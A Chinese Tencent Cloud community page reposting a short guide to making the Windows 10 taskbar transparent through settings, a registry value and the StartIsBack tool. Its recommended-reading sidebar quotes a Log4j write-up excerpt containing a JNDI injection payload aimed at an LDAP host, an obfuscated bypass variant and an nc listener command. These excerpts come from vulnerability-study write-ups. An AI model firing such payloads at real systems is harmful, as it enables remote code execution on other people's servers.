前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >Win10系统任务栏如何设置透明

Win10系统任务栏如何设置透明

作者头像
用户8002245
修改于 2020-12-29 10:04:44
修改于 2020-12-29 10:04:44
1.1K0
举报
文章被收录于专栏:数码科技数码科技

1、首先单击开始菜单-设置-个性化-颜色,开启使开始菜单、任务栏和操作中心透明选项,

2、在键盘上同时按下“Win+R”组合键打开运行,在运行中输入“regedit”命令打开注册表,

3、在注册表编辑器界面中,依次展开:“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced”路径。

4、在界面的右侧栏中新建名为“UseOLEDTaskbarTransparency”的 DWORD(32位)值(D),

5、完成以上设置之后,Win10任务栏变透明了,但是任务栏在百分之80左右,可以借助第三方软件来将Win10任务栏变100%完全透明的方法,使用到的软件名叫“startisback”,用户自行网上搜索下载地址,下载安装“startisback”并打开,

将自定义外观选项下勾选“使用自定义开始菜单颜色”和“使用自定义任务栏颜色”的选项,并将旁边的两个拖拉至左边即可,最后单击应用-确定。

本文系转载,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文系转载,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
JNDI与RMI、LDAP
JNDI 全名 Java Naming and Directory Interface,实际上简单来说就是一个接口,应用通过该接口来访问对应的目录服务。好吧,先了解一下目录服务是啥。
HhhM
2022/08/10
1.5K0
JNDI与RMI、LDAP
Log4j-JNDI注入RCE
漏洞简介 影响版本 Apache Log4j 2.14.1 Apache Log4j Security Vulnerabilities log4shell - Quick Guide 漏洞利用 Log4j 2.14.1 - RCE CVE-2021-44228 POC ${jndi:ldap://xxx.dnslog.cn/exp} # Bypass ${j${lower:n}di:l${lower:d}ap://xxx.dnslog.cn/exp} RCE 首先Netcat监听端口 $ nc -lvn
Naraku
2022/02/24
1.9K0
Log4j-JNDI注入RCE
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
这里做一个复现学习的小文章,由于对java这方面的知识雀食是薄弱,而且本地复现时,出现了挺多问题,在本地复现时,不知道是什么原因,利用payload去打的时候,总是说loggxxx模块不存在...idea也犯毛病...果断直接用网上的靶机去复现一波
vFREE
2021/12/20
15.3K0
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
JNDI注入原理浅析
JNDI (Java Naming and Directory Interface) 是一个java中的技术,用于提供一个访问各种资源的接口。比如通过JNDI可以在局域网上定位一台打印机,或者定位数据库服务,远程JAVA对象等。 JNDI底层支持RMI远程对象,RMI注册的服务可以直接被JNDI接口访问调用。
ConsT27
2022/02/11
3.4K0
JNDI注入原理浅析
零信任理念有望缓解fastjson软件漏洞
零信任理念有望缓解fastjson软件漏洞动态信任,缓解漏洞基于线程隔离的资源访问精细化访问控制应急响应平滑下线实时安全策略变更假定被攻击使用高版本的jdk的增加攻击难度使用反序列过滤器按需权限原则和RASP、安全sdk、沙盒的不同参考资料
糖果
2020/04/27
8160
零信任理念有望缓解fastjson软件漏洞
Log4j_2.17.0_RCE复现-CVE-2021-44832
然后Java编译成class,现在就可以在config和这个恶意类同目录下开启简单的Python http服务
UzJu@菜菜狗
2022/04/25
4790
Log4j_2.17.0_RCE复现-CVE-2021-44832
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
这里做一个复现学习的小文章,由于对java这方面的知识雀食是薄弱,而且本地复现时,出现了挺多问题,在本地复现时,不知道是什么原因,利用payload去打的时候,总是说loggxxx模块不存在...idea也犯毛病...果断直接用网上的靶机去复现一波
vFREE
2021/12/19
10.8K0
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
Apache Log4j2 日志记录服务之远程代码执行漏洞实践与防护
注意:本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。
全栈工程师修炼指南
2022/09/29
9290
Log4j2 漏洞实战案例
在现在以及未来的一段时间里,Log4j2 漏洞依然是渗透和排查的重点。在测试靶场里复现多次,在实战中遇到还是十分兴奋,So,总得记录点什么吧。
Bypass
2022/04/19
1.1K0
Log4j2 漏洞实战案例
CVE-2020-36186:jackson-databind RCE
org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成RCE。
Al1ex
2021/04/01
1.3K0
CVE-2020-36186:jackson-databind RCE
Bugku---Apache Log4j2 RCE
1.bugku---Apache Log4j2 RCE 1.1 打开题目 image.png 注意:描述中的命令后面跟的×说明不支持这个命令,√则代表可以使用 1.2 构建一个JNDI服务 Github: https://github.com/welk1n/JNDI-Injection-Exploit 1.2.1 构建 1.cd JNDI-Injection-Exploit 2.mvn clean package -DskipTests 3.java -jar target/JNDI-Injection-E
vFREE
2022/08/08
4900
Bugku---Apache Log4j2 RCE
漏洞复现 - - - Fastjson反序列化漏洞
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。Fastjson 源码地址:https://github.com/alibaba/fastjson
干掉芹菜
2022/11/19
1.6K0
漏洞复现 - - - Fastjson反序列化漏洞
浅析Log4j2Rce
先调用logIfEnabled函数判断当前事件类型的优先级,如果优先级不够就不会进行之后的代码操作
ConsT27
2022/03/02
1.2K0
浅析Log4j2Rce
log4j远程代码执行漏洞原理详解及复现
JNDI: java命名和目录接口,通过访问JNDI,根据命名服务或目录服务来获取相应的资源。命名服务:键值对绑定key = value,通过键名检索值,RMI(远程方法调用)就是典型的命名服务。
红队蓝军
2024/08/01
1.2K0
log4j远程代码执行漏洞原理详解及复现
CVE-2020-36186:jackson-databind RCE
org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成RCE。
Al1ex
2021/07/21
8350
CVE-2020-36186:jackson-databind RCE
CVE-2020-xxxx:Jackson-databind RCE
com.nqadmin.rowset.JdbcRowSetImpl类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成RCE。
Al1ex
2022/09/07
3960
CVE-2020-xxxx:Jackson-databind RCE
CVE-2020-24750:Jackson-databind RCE
com.pastdev.httpcomponents.configuration.JndiConfiguration类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成RCE。
Al1ex
2021/07/21
1.2K0
CVE-2020-24750:Jackson-databind RCE
log4j代码注入漏洞复现
前些天log4j官方宣布的log4j的漏洞闹得沸沸扬扬,各个公司加班升级修复,我们也在周末要求验证版本保证不受影响,既然知道了漏洞,我们就复现一下,比如让被注入文件的电脑关个机
余生大大
2022/11/02
5500
log4j代码注入漏洞复现
从羊城杯一道题学习高版本JDK下JNDI的利用
主要关注到/ApiTest/post控制器,接收了传入的数据参数,并且使用JSON.parseObject函数解析数据,从而触发fastjson反序列化,
h0cksr
2023/05/17
1.2K0
5 分钟复现 log4J 漏洞,手把手实现
2021年12月10日凌晨前,网上曝出了 log4j 的核弹级漏洞,这种漏洞超级高危,操作简单,利用方便,适用范围广,可以直接任意代码执行,接管你的服务器。
未读代码
2021/12/13
8.1K0
5 分钟复现 log4J 漏洞,手把手实现
相关推荐
JNDI与RMI、LDAP
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档